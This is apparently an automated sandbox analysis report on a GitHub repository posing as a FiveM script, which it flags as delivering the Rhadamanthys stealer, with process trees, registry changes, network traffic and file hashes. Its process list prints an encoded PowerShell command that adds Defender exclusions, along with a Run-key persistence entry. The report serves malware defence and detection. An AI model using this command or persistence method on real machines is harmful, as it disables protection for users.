Analysis Overview
Threat Level: Known bad
The file https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Loads dropped DLL
UPX packed file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Detects Pyinstaller
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 17:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 17:14
Reported
2024-03-27 17:16
Platform
win11-20240221-en
Max time kernel
52s
Max time network
55s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3468 created 2556 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133560333151871935" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Xander3434/SKRIPTGG-FIVEM?tab=readme-ov-file
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe71de9758,0x7ffe71de9768,0x7ffe71de9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_SKRIPTGG-FIVEM-main.zip\SKRIPTGG-FIVEM-main\Skript.rar"
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=748 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=744 --field-trial-handle=1856,i,15691179753510776645,15795851274177222192,131072 /prefetch:8
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | udp |
| DE | 140.82.121.10:443 | codeload.github.com | tcp |
| N/A | 224.0.0.251:5353 | udp |
Files
\??\pipe\crashpad_2788_DEPCNSNKQIVWQQUW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | abc87457e2bf86c1297021067e7281fc |
| SHA1 | 805388a2fa900ac28b937ace125a4d4f8afa53f5 |
| SHA256 | 598aef6bbe39ea21f988cc192317059c15b01c24ed5b24ebf454d2203d9de646 |
| SHA512 | d55740f7437f3be13e265ae07c3665f552577f14b6f93549574634e0d622591ffcae10d9eab52ddb0a3a6b045886b8e6c865d34f972a0b8e6c088309655d87ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b28cd8c7e1baeb92f287f7196c914e23 |
| SHA1 | d927d1cdb6e794a910be1bc89d1ca3b0560a5bec |
| SHA256 | 72305b3328e72ec38dcd18b8889476aaf062b3bebe17f2a61b3edfffb0bc48cb |
| SHA512 | b7b4a26703887ea56ba5cdbd8f2e362494eb14d6156e5e2cfeec3c0cfa54f465ecc2b99f71597a1c17e6819623d26323f58d2f004f90076ee0cd2c31c7e9d850 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c8ddd319b049fe44ccb8f4fa8fdcfbad |
| SHA1 | 1f8e742313155c6fb083cf64a995086909806eb8 |
| SHA256 | 2b4d5abbdeb883bb460c522698406f7b25b6d072a2f92782a1525c088d9a7454 |
| SHA512 | f7acc0167ad42764a43630727e3b82c52c6c2943ca5ff5395ded55dccc24cf5a8f94667efa8e067ee873b6b555944e769e406720275ebccffea558054680fd9e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a6184a0a3dec1c7d2d138d19db7db363 |
| SHA1 | 21be18aaf810db19e74fe9ae4c9182f50feaafdc |
| SHA256 | ac2d1370a61c0c54f9996fc98fadf7ebc87a5abbb0f1e8f1ea68d652f08bca10 |
| SHA512 | f28afffb7f9731b40e1df7461e130a70226ce86b3eb1c74d2e13b6295d0b1e8f620b88e299d1ba9db0de654783c425a7681977e2439fb3b2696a32587c77cdc9 |
C:\Users\Admin\Downloads\SKRIPTGG-FIVEM-main.zip
| MD5 | 5e65bdca353aeabd62fa725b97e4bcf9 |
| SHA1 | 045b32c4f5c08e0de0df3a9b519ef5cfa71f5194 |
| SHA256 | 38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2 |
| SHA512 | 93544f6643222df73bdbb5c8bb08c07f9c595c9c83e8d96066fb73b86d165f1f742bd79e656d5fcc80b4258fd8d566cbb3a44c23fa4e4bb5f5d49a3459dba075 |
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
| MD5 | 465669a572d077471d1b1a3a2ea11f78 |
| SHA1 | 49ec69d4c986c778cbef3ffa9c72116eda8be10a |
| SHA256 | c5999468752a61442001b68405c29f509e82a7167d354e427bcc870f7b368324 |
| SHA512 | 56619cb7c58bd5996ce5a0a952adfffb520653c4de328b478adb04c61d767ace9bf1ce7b5936cc3131680ca59f3b7ae850be5d883856835bad99fe4ca1a3115a |
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe:Zone.Identifier
| MD5 | 3c41410c4fd694c8ba99ecec4c6eff11 |
| SHA1 | 2b676e157e187af40d7d127ef810283e290cf96c |
| SHA256 | 9a854108a2e693f3dd049bbe3c7bae7a4894eed071c285783cbe3962550395dc |
| SHA512 | 365a9840e3e514a5a5998590dd73b418d3609a88db56a25bb04fed632040cc3f73e6aa9f96b9e98a7d1508b1b6a9c72147b143f1d2cac2bcf1ce3371bec815f3 |
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
| MD5 | 2bb02618abeccb4271f39f581afc6003 |
| SHA1 | fd51a6177b75a183f83faa07b85b26eafa56a354 |
| SHA256 | f2c2b91972e1dc86e82f64506ddc242474e372a1fdd7ecac56679bb413a3d95d |
| SHA512 | 46ec6395a84c5de201f0a80930686bea641e74188522b200a40b38eca5dce14dda4c21d6e65199dc95aea1714a237e4c9fbb7c72db2214280019a074111aaffa |
C:\Users\Admin\AppData\Local\Temp\7zO8141FAF7\launcher.exe
| MD5 | cf14aa6e5982a60e6ef39db5964221b2 |
| SHA1 | e29a62c89f9084279a854f3208ce234b88e85ae0 |
| SHA256 | b0b9526fedf665f68c8a74f20ae2e5b2098f6176684f4fc41d75c4ae2663e75b |
| SHA512 | 9cc0f5fdb6dd02fe97b7bcac65d46bf30c32518c8612991108e9e9893158ace87437b05d4e520550be7c55f5a7de7e9b6c1fc8357422daeeefbd7efc39c14770 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 28d79a17cd998d636f3092537ef55055 |
| SHA1 | 7cbabad3034268f723103981eee6bfdd19b87386 |
| SHA256 | 36ecac8ab3ebccbe532cb112dbb71658c66a1dc491cb14e54419ad9082fac2e2 |
| SHA512 | 07b4f297dd4333bb5014462c23c4020f3c68f66fc78b8316c53b63ca4add13dc737334c94cbe5d22970ec283e45fa2e501593634fbb0830f28fa2a4051af1689 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 79a10cb36cbec1e8cd50ffa90e5f8197 |
| SHA1 | dd830d2cc28e2940e80f25143032a0e4985fbd80 |
| SHA256 | 372a4508297b9546c967b67cb2abd4005dc73aeb54258f6a075f49eded5cd7b7 |
| SHA512 | 5c596d65baa2d5a610d4a2ce372a23795762928debfb90a579fa21d8398578e3d46a345b0a49969d8864375a437d0b46e467bbfb15e7fe9b01173435e75bf08c |
C:\Users\Admin\AppData\Local\svchost.exe
| MD5 | 8a6f1580a5b9b94d7cd47cc6b1af1b9a |
| SHA1 | e68768afd59e18091d345cb300e859572e8d4c5c |
| SHA256 | bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe |
| SHA512 | 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309 |
memory/3468-224-0x0000000000DE0000-0x0000000000E4D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | c507a34241e66fe6506b155f5d722d46 |
| SHA1 | f4f8488f95342f9355cae76951e7e9f77a5b1ac1 |
| SHA256 | ff9a68735435585525e7ac0885c717b202a6b9efd8902f04c3754e6a717bfafa |
| SHA512 | 7f5adf399e4dc3e4112a475ba2824e6dde82aa476b800e05bfc0ef7d2339863ceac9d579e1e1bcbf2d822427a8af15ef041ce1794b43b4fecb3764c6d27c9d6d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b2f5c306c67fdbb6fa1f89107b31956c |
| SHA1 | 19b0a4b076842ec0992e9ac69ceb7b906cca9987 |
| SHA256 | d6652e8ff910dd6ed47306796d48b675f323b71fd317b1f7f23657510de075b4 |
| SHA512 | 5e58e0f647056485ea419ee18363a0ea0d76aaaa6ef87b6aadf519c09aec80a17cda3487b082f2e2a4bc79de840d67ae8f978b57dedef2191561430554e212dd |
memory/692-239-0x0000000072FA0000-0x0000000073751000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\python310.dll
| MD5 | 12be9e904b6e7695fab14cadd8312c42 |
| SHA1 | 36a7aed1a00a6001a30909ad66c769dac2f410a0 |
| SHA256 | 30b1a69e4849812296ace5d43620a59ed348be86f75bf23d5a5ee96b08b531cf |
| SHA512 | c48914063e109da3735dbe1eacba4386f4e5ddaaddd654d8eb6354168f5f7bb01a975f6ca199bbda8517a204ea5aad53000331ff64164c0ea37084307247a4ba |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 4de4d85fe66551584dd024cdfedd99a3 |
| SHA1 | 16e5d998d2481573aa8cd9b56dfaf778dd6f1391 |
| SHA256 | 81b033e5ba8d54c91cbe9c74307d6e76711ea8f8142e8fad5d540507d64fdd6d |
| SHA512 | 138381294ee0e94502126973b5f2098fd53edf0b7dd16d31fabc2bdb225e7594d78ed9912e17a5adcf81b2c3b96a669bc62bb46c0be0cc62dfdaf7bbc7a7eba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI10762\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/692-244-0x00000000028C0000-0x00000000028F6000-memory.dmp
memory/4872-246-0x00007FFE5C6C0000-0x00007FFE5CB26000-memory.dmp
memory/692-247-0x0000000004B10000-0x0000000004B20000-memory.dmp
memory/692-248-0x0000000005150000-0x000000000577A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
C:\Users\Admin\AppData\Local\Temp\_MEI10762\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
memory/4872-262-0x00007FFE5FF20000-0x00007FFE5FF44000-memory.dmp
memory/4872-263-0x00007FFE770F0000-0x00007FFE770FF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\_lzma.pyd
| MD5 | 7c66f33a67fbb4d99041f085ef3c6428 |
| SHA1 | e1384891df177b45b889459c503985b113e754a3 |
| SHA256 | 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866 |
| SHA512 | d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d |
memory/4872-271-0x00007FFE70D60000-0x00007FFE70D78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\_bz2.pyd
| MD5 | f6e387f20808828796e876682a328e98 |
| SHA1 | 6679ae43b0634ac706218996bac961bef4138a02 |
| SHA256 | 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b |
| SHA512 | ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e |
memory/4872-272-0x00007FFE5FEF0000-0x00007FFE5FF1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\_socket.pyd
| MD5 | 0dd957099cf15d172d0a343886fb7c66 |
| SHA1 | 950f7f15c6accffac699c5db6ce475365821b92a |
| SHA256 | 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a |
| SHA512 | 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee |
memory/692-273-0x0000000004EE0000-0x0000000004F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI10762\_hashlib.pyd
| MD5 | 13f99120a244ab62af1684fbbc5d5a7e |
| SHA1 | 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724 |
| SHA256 | 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b |
